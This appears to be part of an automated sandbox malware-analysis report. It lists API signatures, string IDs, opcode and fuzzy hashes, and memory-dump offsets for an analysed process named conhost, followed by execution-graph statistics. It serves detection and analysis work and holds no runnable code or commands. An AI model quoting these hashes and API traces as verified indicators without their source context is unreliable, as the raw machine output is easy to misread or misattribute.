                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                  • String ID: wr
                                                  • API String ID: 1092925422-2678910430
                                                  • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction ID: 487af0ae942cd46f838c95c761afde914662b0774f41d704600b04d08b3ac3f3
                                                  • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                  • Instruction Fuzzy Hash: 28118E3630074182EF149B1AE4252A962A0FB89F84F890029DE8903758EF7DC959C786
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Thread$Current$Context
                                                  • String ID:
                                                  • API String ID: 1666949209-0
                                                  • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction ID: ceef99034c0caa3fcfdf5bf01d996694676cc645707f0d06158603716d7d5545
                                                  • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                  • Instruction Fuzzy Hash: BCD1DC36205B8886DB70DB0AE4A039A77A0F7C8F84F550116EACD47BA5CF7CC554CB52
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$AllocFree
                                                  • String ID: dialer
                                                  • API String ID: 756756679-3528709123
                                                  • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction ID: dd2170cbdcdf5589f1ec15d37e35de065a2fbe65289c0a2ac3fb9da7283084b6
                                                  • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                  • Instruction Fuzzy Hash: E731C032301B5182EA25DF1AE5607A967A0FF84FC0F8D40249E8847B55EFB8C4B9C383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Value$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2506987500-0
                                                  • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction ID: 40c64138c2171832f524187b7b86323af46ed96d61edfcc9a14afa79f557fd9d
                                                  • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                  • Instruction Fuzzy Hash: 4011903124538041FA64976D55717E922425FD4FB0F9E8324A936876E7DFE8843A8383
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                  • String ID:
                                                  • API String ID: 517849248-0
                                                  • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction ID: df625baa75d7878af30de2f3ac2e36439914ce756fbb079cafaf1258dc23c774
                                                  • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                  • Instruction Fuzzy Hash: C4016D31300A4086EB54DB5AA468B9AA3A1FB88FC4F894035DE8943754DF7CC95DC782
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                  • String ID:
                                                  • API String ID: 449555515-0
                                                  • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction ID: d2b7a2c3992e3e905ba16aa76400f5a4c5d0f87e38b3a174444f4f952ea106a6
                                                  • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                  • Instruction Fuzzy Hash: 3D01617431174086EB249B19E82939923A0BF94F81F880425CD8917764EFBCC52CC783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: 36dd3d6baaa5d4aba0ab5a68305d4d0444199126cfc5f66fb57e1aee94e9e123
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: 8751C63270160086DB14DF19D458BD93796FBC4F98F9A8124DB5643788DBBACC69C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 2395640692-629598281
                                                  • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction ID: b738d3e342731c55204d4a401c5f634a1986c45f26c46979aa88b54f5417c52d
                                                  • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction Fuzzy Hash: 0331D63130064086E714DF1AE85879977A9FBC4F88F8A8014EF5643785DBBAC968C787
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FinalHandleNamePathlstrlen
                                                  • String ID: \\?\
                                                  • API String ID: 2719912262-4282027825
                                                  • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction ID: 921ad195734b79701625a16e3ac60331d6dea479b2b4891406c28a9dbdb77b20
                                                  • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                  • Instruction Fuzzy Hash: D8F0493230464591F7608F19F8A479A6761FB88FD8FC84024DA8D47554DFBCCA5DC782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CombinePath
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3422762182-91387939
                                                  • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction ID: 052d63e9a334326523a53025b95f65cab95b2d6607c34902bc58c353e4b80375
                                                  • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                  • Instruction Fuzzy Hash: 7EF08230304B8482EA008B5BB925199A261AF88FC0F8C4035EE8A47B18DF7CC86D8783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction ID: 7f1400b797cedca6b16a3af2328859c72fc7d201440333d75b27cd56064353ab
                                                  • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                  • Instruction Fuzzy Hash: B5F0127121160581EF148B2CE4653996360EFC5F61F990219DAAA471F4DFACC56DC7C3
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction ID: 87bb582ceeb14a71fb0b9cf79bb49cf314316caa3053ea11c1f830c5c3c6b50a
                                                  • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                  • Instruction Fuzzy Hash: DE02FE32619B8486E760CB5AF49079AB7A0F7C5B80F550015EACE47BA8DFBCC458CF52
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentThread
                                                  • String ID:
                                                  • API String ID: 2882836952-0
                                                  • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction ID: a0f15374be1fafb4abe1d7826e88ea18014ff4279ce8a437edb09c3b702d1e27
                                                  • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                  • Instruction Fuzzy Hash: C3613E36118B44C6E760CB1AE46475E77A0F7C9B84F950115EA8E43BA8DBBCC468CF93
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: f294e2d8a0763c7dcca65170a035a102959bb6516f637d8402315d813bedcd36
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 8F11A332A10A1111FEE45538E4713E911C16FD9B74FCC8638A97E0B3E6CAE8C87D4382
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: _set_statfp
                                                  • String ID:
                                                  • API String ID: 1156100317-0
                                                  • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction ID: a34f8e5019194e6d20d766b0e5f80edf4312116f95ed2c457afdaedb587612af
                                                  • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                  • Instruction Fuzzy Hash: 13119132A18A5111F66C1E7CE4733E511406FE9BF8FDC0625A976476D68BE4C8AA42C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: _invalid_parameter_noinfo
                                                  • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                  • API String ID: 3215553584-4202648911
                                                  • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction ID: fea095b42ecc100f73ed76f24746f5af054c34e1799ae75f2706fb8b7795d38d
                                                  • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                  • Instruction Fuzzy Hash: D861C43266064042FA658B68E5603EE6AA2EFC6F40FDC4715CA0E17794DBB5D87D83C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallEncodePointerTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3544855599-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: 910dd0644204460932afc774496e4adba09f489cfeaad10c45dea0d487860a31
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: 30617E33600B448AE720DF69D4547DD77E0FB84B88F494215EF4A17B98DBB8C5A9C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: b8923c6eec482e3861280229c2910a6a01e5bfe3d9eb113536725d486cb54f56
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 00518032100280CAEB688B2695643987BA1FBD5F84F9C4315DB9D47BD5CBB9D478C782
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                  • String ID: csm$csm
                                                  • API String ID: 3896166516-3733052814
                                                  • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction ID: f255c9043e0841a50e92e706ea7012208235f75df427cbaed7ab14043d795f9d
                                                  • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                  • Instruction Fuzzy Hash: 5F518E721002808AEB748F6994A839977E0FB94F84F9D4115DB9947BD5CBB8D478C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction ID: fad40bdf7da6bcae9f4323cba3989db6887887c807032d4075d1549b3d921be4
                                                  • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                  • Instruction Fuzzy Hash: 6951D43270120086DB54CF15D414BD937A5FB90F98F998224DA5F43788EBB8DD78C786
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CurrentImageNonwritable__except_validate_context_record
                                                  • String ID: csm$f
                                                  • API String ID: 3242871069-629598281
                                                  • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction ID: 536c385735ca2a64a10becc9699eb9d47b8e3b4b9a41c7b742be340cf94dba9e
                                                  • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                  • Instruction Fuzzy Hash: 0231AF3120164096EB54DF11E8547D937A8FB80F88F898214EE5B07784DBBCC978C786
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                  • String ID:
                                                  • API String ID: 2718003287-0
                                                  • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction ID: 7834a4dfc4659904e1234c0e5b698e7c7b9b4d58cfa958d79a683019ffbdc685
                                                  • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                  • Instruction Fuzzy Hash: BBD1E332714A8089E711CF69D4503DC3BB1FB94B98F984216CE5E97B99DBB4C42AC3C6
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$Process$Free
                                                  • String ID:
                                                  • API String ID: 3168794593-0
                                                  • Opcode ID: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction ID: db9cc38fb0fd0fd1d16bc80fbf27160a659cbe078d980761268a28c55b338b55
                                                  • Opcode Fuzzy Hash: 57ec4baa428d3a80e79e8f3b815539f76c7f0782526738c577e62bebd88a5cdf
                                                  • Instruction Fuzzy Hash: 64015E32600F90C6D708DF6AE91518E77B1FB89F81F484425EA8943729DF78C465C7C2
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ConsoleErrorLastMode
                                                  • String ID:
                                                  • API String ID: 953036326-0
                                                  • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction ID: 2b87452e8a2e49fdbbf97a7b9e19cdb6db8bebdfc1f234b877c0fee6c18721f7
                                                  • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                  • Instruction Fuzzy Hash: 5491F37270065085F760DF2D94627ED2BA0FB94F88F9C4109DE4A67694CBB8C4AAC3C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction ID: 9a8afaf80fad37418c58c16810faeebf007dbffc6895f6fd6989cf508ba2373e
                                                  • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                  • Instruction Fuzzy Hash: D671E53620078185E7249F2D98643EA67A4FBC5F84FCA0116DE0A43B89DFF5C669C783
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: CallTranslator
                                                  • String ID: MOC$RCC
                                                  • API String ID: 3163161869-2084237596
                                                  • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction ID: 965174dac6185b192a24f5038359a7ecae64b3d8a16d5e9078e4bededc9e25f2
                                                  • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                  • Instruction Fuzzy Hash: D9615533601A848AEB20DF65D4903DD77A0FB88F88F584215EE4D17B99DBB8D1A9C781
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: FileType
                                                  • String ID: \\.\pipe\
                                                  • API String ID: 3081899298-91387939
                                                  • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction ID: 4de147e3c72983a59083b9aa10c365b65f999c79e391568a3eabf078bcf9e6c3
                                                  • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                  • Instruction Fuzzy Hash: 2A51E232604B8185E6A4DA2DA0783EA6755FBC5F80FCE0125DE4903B99CBF9C52C87C3
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastWrite
                                                  • String ID: U
                                                  • API String ID: 442123175-4171548499
                                                  • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction ID: 1ddd89d3273077dc7820a653ce1de987e56a7ceef8793438194b87c4c00f5d0c
                                                  • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                  • Instruction Fuzzy Hash: E941E872314A8086DB20CF29E4553DA77A0FBD8B94F844021EE4E87798DBBCC455C7C2
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFileHeaderRaise
                                                  • String ID: csm
                                                  • API String ID: 2573137834-1018135373
                                                  • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction ID: b25a908294b73ef63bb52b4bb927f807a99cc5b85861d22033e407a51e74b54f
                                                  • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                  • Instruction Fuzzy Hash: BF114932204B8082EB208B19E450299B7E4FBC8F94F994264EBCC07758DF79C965CB41
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: ierarchy Descriptor'$riptor at (
                                                  • API String ID: 592178966-758928094
                                                  • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction ID: 2990852797fe387591d5b5b8e5f1ddbf6737eadc46c0566ce875acfc617ef091
                                                  • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                  • Instruction Fuzzy Hash: F1E08671640B4990DF028F62E8502D833A0DFD8F64B8C9122995C07311FA7CD1FDC341
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261587684.0000019A497D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000019A497D0000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a497d0000_conhost.jbxd
                                                  Similarity
                                                  • API ID: __std_exception_copy
                                                  • String ID: Locator'$riptor at (
                                                  • API String ID: 592178966-4215709766
                                                  • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction ID: ca308a2d7f9d06010a92b7ab7c036669e45a5b2b06f91dae3968c26cf3c1f6d4
                                                  • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                  • Instruction Fuzzy Hash: BBE08671600B4880DF028F61E4502D87360EB98F64BCC9122C95C07311EA7CD1F9C341
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2261634689.0000019A49800000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000019A49800000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_19a49800000_conhost.jbxd
                                                  Similarity
                                                  • API ID: Heap$AllocProcess
                                                  • String ID:
                                                  • API String ID: 1617791916-0
                                                  • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction ID: 84b3a6a7c66daf5af35c7e3426cc77c91b5f3c8144fc363aaf6171ba13fbe17f
                                                  • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                  • Instruction Fuzzy Hash: 57E0397560160486EB098B66E82938A36E1EB89F06F898024898907351DFBD88A9C7D2

                                                  Execution Graph

                                                  Execution Coverage:80.5%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:0%
                                                  Total number of Nodes:28
                                                  Total number of Limit Nodes:1

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_00401000 1 Function_00401410 2 Function_004014D1 4 Function_0040145B 2->4 3 Function_004013B4 4->1 4->3 5 Function_0040108C 4->5 5->0

                                                  Control-flow Graph

                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.2127266229.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
